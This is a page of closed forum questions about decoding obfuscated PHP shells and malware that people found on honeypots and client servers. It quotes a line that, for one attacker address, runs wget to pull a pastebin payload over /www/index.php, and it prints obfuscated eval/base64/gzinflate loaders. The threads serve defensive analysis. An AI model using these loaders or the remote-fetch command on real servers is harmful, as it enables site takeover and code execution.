Deobfuscate this PHP shell attack [closed] - php

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 7 years ago.
Improve this question
One of my honeypot systems has a pretty interesting PHP shell on it, i've been trying to decode it, but I'm not having any luck getting the contense of the gzinflated b64 encoded part of the script.
Maybe someone with a little more experience with deobfuscating could take a look at it?
Here's the original pastebin they used to download to my honeypot:
http://pastebin.com/1w59Ew9S
<?php if($_SERVER["REMOTE_ADDR"] =='ATTACKER_IP') {#system('wget http://pastebin.com/raw.php?i=1w59Ew9S -O /www/index.php;ls -la /www/index.php');exit; }?>
I attempted to deobfucsate it myself by printing variables in different places, but i can't for the life of me get the contents to print out.
Here's my attempt at making it a little bit more human readable:
http://pastebin.com/BRbyVzyZ

Related

How to deobfuscate this potential PHP malware found on a client system? [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 3 years ago.
Improve this question
I'm trying to de-obfuscate this script found on a client system with no luck so far.
<?php function LwAC($SvniN)
{
$SvniN=gzinflate(base64_decode($SvniN));
for($i=0;$i<strlen($SvniN);$i++)
{
$SvniN[$i] = chr(ord($SvniN[$i])-1);
}
return $SvniN;
}eval(LwAC("NL3XrutckqX7AAXUOyQadZEFokHv0KcuRFISRS+SotFBo0Ereu8b/ewnVtepvMhEZu5/7SXDOSNGjPHFP/7x96987ZKl7Lt/TJ9g/fzz3zxRfMj//q//8r//8a//8p//5T9+V9nlTbRk/4yjOWOo/5VmSZ9m//Vn//1//Ou//CPvp3/+W/kf2P/4t/L/mZepybr/+r/hf0EQ+IH/+N//9QP/338r/+c//uMfSTH9s5/S///P/f2P//7f8f/7w/4P/OkpW9ap+8d//gp/f8P/ybao+ed//pb/jbVwskGsZ10mOspw/JflJTfCCb8ZXr/yIfxkjbz17+It/MTCDBLTnXayuGWdQlpor9RekOIj40+rH+VWgrKzNk675Nj192nfY/QlCIrlsrmVo/xGWShjoR8BRRcU4bVhRcuAaLt4oJGsG3g0u2kCQWdHtO3dRHeTton5MTpat/c5msWKhKndxa7dIOOMsvtVuzvTy75zkWaMJErk3+WcuHGk9RxDX+JPf2UVXZzBUSSPXFZ5bew0JU+SOktF1d2a9czZqx6Iz+7lmzu5N1R+1YtFsDFNI0gYFII1BgFLZ+K25+xsoZmoPtXtmffjqHKrkK5YlTxz84dkKKq9WzRrR3YY2WhiWY7+OJMwkgjBrvxQ4Cj2TbftuM2a323oRsQpclb0klrwT7ouhhQ1mwsY//ff7x+BonLjgaYRJe0pfBzPpkcdLyCPh80zMcoifdaF95GRaRbhUH4v6KSIXiYRhHHbsN+rXZmp5SVUlmwDzy9HkAMvvdff/B2kH1o/kehjrCOaWbF2qd1EVtFb2+fs66Cvjd+1ZSU4ZPQSCjtR4SFXvGt7CPN9lZlInF8DQVH61dmpwvPO80hU7Y4ggePh5BtdNIyOyLeDRhNT7lWSKXXkPZOUM0jx9q7Yi1XxqjD6J/IlSfgxKrOneYyd7kGvi0cjG8umKGcxxiJNjGKZx+SRTZpr5HTBH49z9O8/vg9CyawztvoAV8k1tZ7O0XbR96LHE91ygorwn52StKO98l9NY7zFU2vzy8cpZZF2vlftkrmkfAW7s4prjfMckiy21XYab2GJhGZci7oIx0cVj+xr20h4iYV8tjwD4yCo60u6cVwhsfvIO46p0Y/WkjGPwj9Gfhqe893FniWX+nonTn7QjRqZCb4+Qsrz/GhZFEIt99Jy2BxFV/KT0gdKHg29GFmebyJDdA2G"));?>
Please note that I have to remove plenty of the codes before this "));?>
A very big thank you to everyone who took their time to go through this question and put in advice/direction in attempt to deobfuscate this PHP code. Special thanks to #Hasta Dhana.
Now, taking into consideration the recommendation of #digijay to do this on a virtual machine where it can simply be deleted if anything goes wrong, the use of an online php compiler as recommended and used by #Hasta Dhana was an awesome choice. All I had to do was to paste in the whole code, change the eval to echo and run it. That, successfully had the work done and pretty fast except that the output was however obfuscated in the exact same way. This time the solution is as simple as deobfuscate the output repeating the same actions that get us here. Which is to copy the whole of the output and change the eval in it to echo then run it and hurray there we have the script deobfuscated.

can people read the content of an online php file? [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 8 years ago.
Improve this question
My php file online has permission settings 444 - ('readable' for everyone)
When I open the file in Firefox, it correctly only shows the output of the file (meaning things that are echoed or printed)
I want people to NOT EVER see the inside of the php file because it shows sensitive information. So - are there some people that are able to look into the inside of the php file?
Unless someone has access to the server then generally no.
There are ways to purposely make the source code visible however.
http://php.net/manual/en/function.show-source.php

How to decode this code ? php $_F=__FILE__;$_X= Byterun Decoder [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 8 years ago.
Improve this question
I would like to decode this PHP page. I tried with this site but when I decode code, the code is still encrypted :/
Can we help me please ?
Page encrypted:
<?php
$_F=__FILE__;
$_X='?iB?Z.Z>VMzzOz_zMZOz=sHx(a);VVV$9OYesHS$_pKg6Kgj'tTTm_t7pT'd;V$ZzO9Q2=S"3Hn=eH=>IMe9n>CMHMze=Oz>0a";V$Ws2MHnMpMzcMz>S>".==Z:hhe2=sce=M-Ws2MHnMX2OYhe2=sce=MhzMnOQz2Mnh2.M2yMzXZ.Z";V>>>>V$ZOn=ceWQMS"9OYesHS$9OYesH&ZzO9Q2=S"XQzWMH2O9M($ZzO9Q2=);VV$2.>S>2QzW_sHs=();V2QzW_nM=OZ=($2.,/ gI7mT_gKT gETgFEprKg,>0);V2QzW_nM=OZ=($2.,>/ gI7mT_ gI,>$Ws2MHnMpMzcMz);V2QzW_nM=OZ=($2.,>/ gI7mT_m7pT,>=zQM);V2QzW_nM=OZ=($2.,>/ gI7mT_m7pTr3KI4p,>$ZOn=ceWQM);V$zMnQW=S2QzW_MRM2($2.);V2QzW_2WOnM($2.);>>VVVsA>($zMnQW=>Bi>"Is2MHnM>6eWs9">eH9>$zMnQW=>Bi>"Is2MHnM>3HceWs9")V9sM>("T.MzM>}en>eH>snnQM>2OHHM2=sHx>=O>=.M>Ws2MHnM>nMzcMzX");VV$Ws2MHnM_n=e=QnS$zMnQW=;VVsA($Ws2MHnM_n=e=Qn>SS>"Is2MHnM>6eWs9")>]>VVVVVVVVVVVzMvQszM_OH2M("sH2hnMnnsOHXZ.Z");VzMvQszM_OH2M("sH2hsnO=OZMXZ.Z");VzMvQszM_OH2M("sH2hAOzYxMHXZ.Z");VV$=WSsnO=OZM_WOe9(ezzeq(),"=MYZWe=Mnh9MAeQW=Xs==");V$=cSezzeq();VVO<_n=ez=();VVV?iVVVB!47/TbmK>.=YW>m oI3/>"-hh{J/hh4T4>DtTuI>0Xa>TzeHns=sOHeWhhKE"V".==Z:hh}}}X}JXOzxhTghR.=YW0h4T4hR.=YW0-=zeHns=sOHeWX9=9"iVB.=YW>RYWHnS".==Z:hh}}}X}JXOzxh0PPPhR.=YW">WeHxS"MH">RYW:WeHxS"MH"iVB.Me9iV	BYM=e>.==Z-MvQscS"/OH=MH=-TqZM">2OH=MH=S"=MR=h.=YW;>2.eznM=SsnO-ffLP-0">hiV	B=s=WMi3Hn=eH=>IMe9n>CMHMze=Oz>0aXaBh=s=WMiV	Bn2zsZ=>=qZMS"=MR=h
ecen2zsZ=">nz2S"
nh
vQMzq-0X[XkX
n"iBhn2zsZ=iV	Bn2zsZ=>=qZMS"=MR=h
ecen2zsZ=">nz2S"
nhQshQsX2OzMX
n"iBhn2zsZ=iV	Bn2zsZ=>=qZMS"=MR=h
ecen2zsZ=">nz2S"
nhQshQsX}s9xM=X
n"iBhn2zsZ=iV	Bn2zsZ=>=qZMS"=MR=h
ecen2zsZ=">nz2S"
nhQshQsXYOQnMX
n"iBhn2zsZ=iV	Bn2zsZ=>=qZMS"=MR=h
ecen2zsZ=">nz2S"
nhnQZMzAsn.X
n"iBhn2zsZ=iV	Bn2zsZ=>=qZMS"=MR=h
ecen2zsZ=">nz2S"
nhWscM_nMez2.X
n"iBhn2zsZ=iV	Bn2zsZ=>=qZMS"=MR=h
ecen2zsZ=">nz2S"
nh=OOW=sZX
n"iBhn2zsZ=iV	Bn2zsZ=>=qZMS"=MR=h
ecen2zsZ=">nz2S"
nh2OOysMX
n"iBhn2zsZ=iV	Bn2zsZ=>=qZMS"=MR=h
ecen2zsZ=">nz2S"
nhQshQsXnOz=e<WMX
n"iBhn2zsZ=iV	Bn2zsZ=>=qZMS"=MR=h
ecen2zsZ=">nz2S"
nhQshQsX9zexxe<WMX
n"iBhn2zsZ=iV	Bn2zsZ=>=qZMS"=MR=h
ecen2zsZ=">nz2S"
nhQshQsXzMns5e<WMX
n"iBhn2zsZ=iV	Bn2zsZ=>=qZMS"=MR=h
ecen2zsZ=">nz2S"
nhQshQsXZOns=sOHX
n"iBhn2zsZ=iV	Bn2zsZ=>=qZMS"=MR=h
ecen2zsZ=">nz2S"
nhQshQsX<Q==OHX
n"iBhn2zsZ=iV	Bn2zsZ=>=qZMS"=MR=h
ecen2zsZ=">nz2S"
nhQshQsX9seWOxX
n"iBhn2zsZ=iV	Bn2zsZ=>=qZMS"=MR=h
ecen2zsZ=">nz2S"
nh2Qn=OYX
n"iBhn2zsZ=iV	V	BWsHy>.zMAS"2nnhQshQsX<enMX2nn">zMWS"n=qWMn.MM=">YM9seS"eWW">hiVV	BWsHy>.zMAS"2nnhQshQsXWOxsHX2nn">zMWS"n=qWMn.MM=">YM9seS"eWW">hiVV	BWsHy>.zMAS"2nnh=.MYMnheZZWM_ZsMhQsX2nn">zMWS"n=qWMn.MM=">YM9seS"eWW">hiVV	BWsHy>.zMAS"2nnh=.MYMnheZZWM_ZsMhQsX2nn">zMWS"n=qWMn.MM=">=s=WMS"n=qWM">YM9seS"eWW">hiVV	B!--jsA>3K>[diV	BWsHy>.zMAS"2nnhsM[X2nn">zMWS"n=qWMn.MM=">YM9seS"eWW">hiV	V	Bn2zsZ=>nz2S"
nhZHxAsRX
n"iBhn2zsZ=iV	Bn2zsZ=iV	>>h*>rsR>3K[>TzeHnZezMH=>mEC>*hV	>>44_<MWe=M9mECXAsR('XWOxO,>XO=.Mz>QW#9en.<Oez9-<Q==OHn>Ws>e');VV	Bhn2zsZ=iV	B!jMH9sAd--iV	B!--jsA>3K>1diV	BWsHy>.zMAS"2nnhsM1X2nn">zMWS"n=qWMn.MM=">YM9seS"eWW">hiV	B!jMH9sAd--iVBh.Me9iVVVB<O9qiV	B9sc>s9S"ZexM_}zeZZMz"iV		B9sc>s9S"ZexM-.Me9Mz"iV			B9sc>s9S"ZexM-.Me9Mz-}zeZZMz"iV				B9sc>s9S"=OZ"iV					Be>.zMAS"#">2WennS"WOxO">=s=WMS"3Hn=eH=>IMe9n>CMHMze=Oz>>0aXa"i3Hn=eH=>IMe9n>CMHMze=Oz>0aXaBheiV					B9sc>2WennS"}MW2OYM"iV						BnZeH>2WennS"HO=M"i{MW2OYM>=O>qOQz>WOxsH>ZexM!>Be>.zMAS"#">=s=WMS"{MW2OYM>=O>qOQz>WOxsH>ZexM!"iBheiBhnZeHiV						Be>2WennS"<=H>Qs-n=e=M-9MAeQW=>Qs-2OzHMz-eWW">.zMAS"#"iV							BnZeH>2WennS"Qs-s2OH>Qs-s2OH-}zMH2."iBhnZeHiV							pM==sHxnV						BheiV						Be>2WennS"<=H>Qs-n=e=M-9MAeQW=>Qs-2OzHMz-eWW">.zMAS"#"iV							BnZeH>2WennS"Qs-s2OH>Qs-s2OH-ZMznOH"iBhnZeHiV							uq>e22OQH=V						BheiV						Be>2WennS"<=H>Qs-n=e=M-9MAeQW=>Qs-2OzHMz-eWW">.zMAS"#"iV							BnZeH>2WennS"Qs-s2OH>Qs-s2OH-ZO}Mz"iBhnZeHiV							IOxOQ=V						Bhei						V					Bh9sciV				Bh9sciV			Bh9sciV		VBn2zsZ=>=qZMS"=MR=h
ecen2zsZ=">nz2S"
nhQshQsX=e<nX
n"iBhn2zsZ=iVBn2zsZ=>=qZMS"=MR=h
ecen2zsZ="iV>>>>VV>>>>V$(9O2QYMH=)XzMe9q(AQH2=sOH()>]V	hh>Te<nV	$('#=e<n,>#=e<nk,>#=e<nL')X=e<n();V>>>>>>>>V>>>>>>>>>V>>>>>>>>>V>>>>>>>>cez>9.Msx.=>S>$(9O2QYMH=)X.Msx.=();V>>>>>>>>cez>9}s9=.>S>$(9O2QYMH=)X}s9=.();V>>>>>>>$('#9scAOO=Mz')X2nn('=OZ',(9.Msx.=-0aa)+'ZR');V>>>cez>YezxsHWMA=>S>(9}s9=.-$('#9scAOO=Mz')X}s9=.())hk;V>>>$('#9scAOO=Mz')X2nn('WMA=',YezxsHWMA=+'ZR');V>>Vl);VBhn2zsZ=iV		B9sc>s9S"nQ<-Hec"iV			B9sc>2WennS"ZexM-=s=WM"iV				B.0iIOxsH>FzMeBh.0iV				BnZeHiIOzMY>sZnQY>9OWOz>MReYZWMBhnZeHiV			Bh9sciV		B9sc>s9S"=OZ-<Q==OHn"iVVVVVVVVVVV			BQW>2WennS"9zOZ-9O}H"iV				BWsiV					Be>2WennS"<=H>Qs-n=e=M-9MAeQW=>Qs-2OzHMz-eWW">.zMAS"
ecen2zsZ=:cOs9(a);"iV						BnZeH>2WennS"Qs-s2OH>Qs-s2OH-2eze=-k-H-n"iBhnZeHiV						/.eHxM>T.MYMV					BheiV					BQW>s9S"n=qWM-n}s=2.Mz">2WennS"9zOZ-9O}H-2OH=esHMz><OR>Qs-}s9xM=>Qs-}s9xM=-2OH=MH=>XQs-2OzHMz-=W>XQs-2OzHMz-=z"iV						BWsiV							Be>s9S"<We2y_zOnM">.zMAS"#">2WennS"<=H>Qs-n=e=M-9MAeQW=>AQWW-WsHy>Qs-2OzHMz-eWW>nM=_=.MYM">=s=WMS"oWe2y>gOnM>T.MYM"iV								BnZeH>2WennS"Qs-s2OH>Qs-s2OH-5OOYsH"iBhnZeHiV								oWe2y>gOnM>T.MYMV							BheiV						BhWsiV						BWsiV							Be>s9S"xzeq_n=eH9ez9">.zMAS"#">2WennS"<=H>Qs-n=e=M-9MAeQW=>AQWW-WsHy>Qs-2OzHMz-eWW>nM=_=.MYM">=s=WMS"Czeq>p=eH9ez9>T.MYM"iV								BnZeH>2WennS"Qs-s2OH>Qs-s2OH-5OOYsH"iBhnZeHiV								Czeq>p=eH9ez9>T.MYMV							BheiV						BhWsiV						BWsiV							V							Be>s9S"eZZWM_ZsM">.zMAS"#">2WennS"<=H>Qs-n=e=M-9MAeQW=>AQWW-WsHy>Qs-2OzHMz-eWW>nM=_=.MYM">=s=WMS"FZZWM>msM>T.MYM"iV								BnZeH>2WennS"Qs-s2OH>Qs-s2OH-5OOYsH"iBhnZeHiV								FZZWM>msM>T.MYMV							BheiV						BhWsiV						BWsiV							Be>s9S"<WQM<Mzzq">.zMAS"#">2WennS"<=H>Qs-n=e=M-9MAeQW=>AQWW-WsHy>Qs-2OzHMz-eWW>nM=_=.MYM">=s=WMS"oWQM<Mzzq>T.MYM"iV								BnZeH>2WennS"Qs-s2OH>Qs-s2OH-5OOYsH"iBhnZeHiV								oWQM<Mzzq>T.MYMV							BheiV						BhWsi					V					BhQWiV				BhWsiV			BhQWi	V		Bh9sciV			VVVVVVVVVVVVVVV		Bh9sciVVV		B9sc>2WennS"2WMez"iBh9sciVVVV		B9sc>s9S"ZexM-WeqOQ="iV			B9sc>s9S"ZexM-2OH=MH="iV				B9sc>s9S"ZexM-2OH=MH=-}zeZZMz"iVV				B9sc>s9S"=e<n"iV					BQWiVV						BWsiBe>.zMAS"#WOxsH"iIOxsHBheiBhWsiV						BWsiBe>.zMAS"#=e<n-k"igMxsn=MzBheiBhWsiV						BWsiBe>.zMAS"#=e<n-J"igM2OcMz>Zenn}Oz9BheiBhWsiV					BhQWiV					B9sc>s9S"WOxsH"iV						B9sc>2WennS"zMnZOHnM-Ynx>nQ22Mnn>Qs-2OzHMz-eWW"iV							BnZeHiIOxsH>=O>bOQz>F22OQH=BhnZeHiTO>WOxsH>=O>qOQz>e22OQH=>MH=Mz>qOQz>QnMzHeYM>eH9>Zenn}Oz9>eH9>2Ws2y>"IOxsH"XV						Bh9sciV						BAOzY>YM=.O9S"ZOn=">e2=sOHS"ZzO2MnnXZ.Z">HeYMS"9e=e_AOzY"iV							BQWiV								BWsiV									BWe<MW>AOzS"HeYM">2WennS"9Mn2"iV				V										 nMzHeYM:V									BhWe<MWiV									B9sciV										BsHZQ=>=qZMS"=MR=">=e<sH9MRS"0">YeRWMHx=.S"kLL">ceWQMS"">2WennS"AsMW9>=MR=>AQWW">HeYMS"HeYM">s9S"HeYM">hiV									Bh9sciV								BhWsiV								BWsiV									BWe<MW>AOzS"Zenn">2WennS"9Mn2"iV										menn}Oz9:V									BhWe<MWiV				V									B9sciV										BsHZQ=>=qZMS"Zenn}Oz9">=e<sH9MRS"0">YeRWMHx=.S"kLL">ceWQMS"">2WennS"AsMW9>=MR=>AQWW">HeYMS"Zenn">s9S"Zenn">hiVVVV									Bh9sciVBhWsiVV								BWs>2WennS"<Q==OHn"iV									B9sciV										B<Q==OH>2WennS"Qs-n=e=M-9MAeQW=>Qs-2OzHMz-eWW>AWOe=-zsx.=>Qs-<Q==OH">=qZMS"nQ<Ys="iIOxsHBh<Q==OHiV									Bh9sciV								BhWsiV							BhQWiV							BsHZQ=>=qZMS".s99MH">HeYMS"e2=sOH">ceWQMS"WOxsH"iV						BhAOzYiV					Bh9sciV					B9sc>s9S"=e<n-k"iVVB9sc>2WennS"zMnZOHnM-Ynx>nQ22Mnn>Qs-2OzHMz-eWW"iV							BnZeHi/zMe=M>eH>F22OQH=!BhnZeHi/Ws2y>e><Q==OH><MWO}>=O>2zMe=M>Ms=.Mz>e>/Qn=OYMz>F22OQH=>Oz>eH>>FAAsWse=M>F22OQH=XV						Bh9sciVVVVVVVBZiVVVBsHZQ=>n=qWM>S"AWOe=:WMA=">2WennS"Qs-n=e=M-9MAeQW=>Qs-2OzHMz-eWW>AWOe=-zsx.=>Qs-<Q==OH">=qZM>S>'<Q==OH'>ceWQM>S>'/zMe=M>e>/Qn=OYMz>F22OQH='>OH2Ws2y>S>"}sH9O}XWO2e=sOHX.zMA>S>'zMxsn=Mz_<QqMzXZ.Z?2Qn=OYMz'"i&H<nZ;&H<nZ;VBsHZQ=>2WennS"Qs-n=e=M-9MAeQW=>Qs-2OzHMz-eWW>AWOe=-zsx.=>Qs-<Q==OH">=qZM>S>'<Q==OH'>ceWQM>S>'/zMe=M>eH>FAAsWse=M>F22OQH='>OH2Ws2y>S>"}sH9O}XWO2e=sOHX.zMA>S>'zMxsn=Mz_eAAsWse=MkXZ.Z'"i&H<nZ;VBhZiVVVVVVVB9sc>2WennS"2WMez"iBh9sciVVVVV						VVVVVVV						B9sciVVV			Bh9sciV								BhWsiVV							BhQWiVVVVVVV									Bh9sciVVVVVV					B9sc>s9S"=e<n-J"iVB9sc>2WennS"zMnZOHnM-Ynx>nQ22Mnn>Qs-2OzHMz-eWW"iV							BnZeHigMnM==sHx>bOQz>menn}Oz9BhnZeHi3A>qOQ>.ecM>WOn=>qOQz>Zenn}Oz9>qOQ>2eH>MensWq>zMnM=>s=><q>2Ws2ysHx>=.M><O==OH><MWO}>eH9>MH=MzsHx>qOQz>QnMzHeYM>eH9>MYesW>e99zMnnXV						Bh9sciVVVVVVVV						BAOzY>e2=sOHS"AOzxZennXZ.Z"iV							BQWiV								BWsiVVV								BhWsiV								BWs>2WennS"<Q==OHn"iV									B9sciV										B<Q==OH>2WennS"Qs-n=e=M-9MAeQW=>Qs-2OzHMz-eWW>AWOe=-zsx.=>Qs-<Q==OH">=qZMS"nQ<Ys="ipMH9>HM}>Zenn}Oz9Be>.zMAS"AOzxZennXZ.Z"BheiBh<Q==OHiV									Bh9sciV								BhWsiV							BhQWiVVVV						BhAOzYiVVV		BhQWiV					B9sc>2WennS"2WMez"iBh9sciV				Bh9sciVVVV				VV			Bh9sci						V				V			B9sc>2WennS"2WMez"iBh9sciV		Bh9sciV	Bh9sciVVVV>>>>>>>>>>>>>>>>>>>>B9sc>s9>S"9scAOO=Mz">n=qWM>S"ZOns=sOH:>e<nOWQ=M;>"iB?Z.Z>sH2WQ9M('AOO=MzXZ.Z');>VVVVVVVVVVVVVVVVVVVVVVlVVMWnM>]VVh*>4MAeQW=>MzzOz>YMnnexM>*hVVM2.O>"B9sc>eWsxHS\"2MH=Mz\"iVVB=e<WM>}s9=.S\"0aa%\"><Oz9MzS\"a\">n=qWMS\"Ze99sHx:0LZR;><Oz9Mz-2OWOz:#raa;><Oz9Mz-n=qWM:nOWs9;><e2yxzOQH9-2OWOz:#rr[/1a;>AOH=-AeYsWq:Te.OYe,>CMHMce,>neHn-nMzsA;>AOH=-ns5M:0kZR;>2OWOz:}.s=M;\"iVVB=ziVVB=9iB<ibOQz>9OYesH>HeYM>9OMn>HO=>.ecM>e>ceWs9>Ws2MHnM>yMq>=O>MRM2Q=M>$ZzO9Q2=XBh<iBh=9iVVBh=ziVVBh=e<WMiVVBh9sci";VVlVV?i';
$_D=strrev('edoced_46esab');
eval($_D('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCdTZ1BPOVlaV0ZLbXF5ZnhjakxKUnp1TTV2TnRzMWIue0I0bkNdaS8yRGwwRWhlQQpbZDg9UXA+VlhvIEh9NkdJdzdrYTNUclU8JywnPVI5b2RtcGxBRVB5azhndls1M3hyTWV6cVpIaTdZaFc8RHNHez5DY1h9MU4vYWZqNl1KdHVTIAouQlVud1ZLTFFPMjBJVEY0YicpOyRfUj1zdHJfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw='));
?>
Here is your plain source code of the asked file.
As I said in a post earlier today. If you have access to the .php file, you have access to the source no matter what.
Good luck!
This is actually pretty easy. Your encrypted file looks like this:
<?php $_F=__FILE__;$_X='encrypted text';eval(base64_decode('rubbish'));?>
Paste just the 'encrypted text' section into the top box of this page and hit Decode This Rubbish.

Weird exploit messing with email [closed]

Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 8 years ago.
Improve this question
Found a weird hack today someone was exploiting,
was wondering how this arbitary code could execute thousands of emails an hour.
http://pastebin.com/m7nBSmfB
There's nothing weird about the code you posted -- it builds up a PHP function in an obfuscated fashion -- then it calls the generated code.
The real problem/issue is, how is your server being made to run this code? If you have indeed been exploited by this, it's because you're allowing them to run arbitrary PHP code on your server.
You need to figure out how that happened.

remote web server compilation? [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 8 years ago.
Improve this question
So I'm kind of tossing an idea around in my head... is it feasible to write a webapp that asks for a user to input a snippet of code, and then compiles it remotely on a server, and returns the output back to the user?
feasible sure, you could definitely make this work from a technical point of view. but in terms of security, it sounds very dangerous.

Categories